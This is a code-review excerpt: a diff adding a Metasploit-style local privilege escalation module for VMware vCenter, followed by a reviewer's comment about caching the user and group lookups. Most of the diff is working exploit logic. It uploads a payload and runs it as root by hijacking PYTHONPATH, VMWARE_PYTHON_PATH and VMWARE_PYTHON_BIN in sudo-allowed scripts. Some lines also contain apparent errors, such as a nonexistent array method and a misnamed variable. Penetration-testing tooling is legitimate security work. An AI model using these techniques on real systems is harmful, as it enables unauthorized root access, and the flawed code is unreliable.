modules/exploits/linux/local/vcenter_sudo_lpe.rb

```diff
@@ -0,0 +1,148 @@
+
+    vprint_good("Exploitable version detected: #{vbuild_version}")
+
+    user = cmd_exec('whoami').chomp
+    groups = cmd_exec('groups').split(' ').chomp
+    if ['infraprofile', 'vpxd', 'sts', 'pod'].contains? user ||
+      ['operator', 'admin'] & group
+      vprint_good("User is vulnerable")
+    else
+      return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})")
+    end
+
+    CheckCode::Appears("System seems exploitable")
+  end
+
+  def exploit_operator_group
+    # for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we
+    # modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution
+    vprint_status("Utilizing PYTHONPATH exploitation method for operator group.")
+    vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py'
+
+    return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/spwd.py"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit_pod_user
+    # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we
+    # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution
+    vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.")
+    mkdir("#{base_dir}/appliance")
+    payload_path = "#{base_dir}/__init__.py"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "echo 'VMWARE_PYTHON_PATH=#{base_dir} sudo install-parameter & exit' | #{executable_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit_admin_group
+    # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN
+    # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution
+    vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.")
+    mkdir("#{base_dir}/appliance")
+    payload_path = "#{base_dir}/__init__.py"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit
+    user = cmd_exec('whoami').chomp
+    groups = cmd_exec('groups').split(' ').chomp
```

Comment:
How about storing these as instance variable so the commands only need to be executed once? The values are highly unlikely to change during the course of exploitation.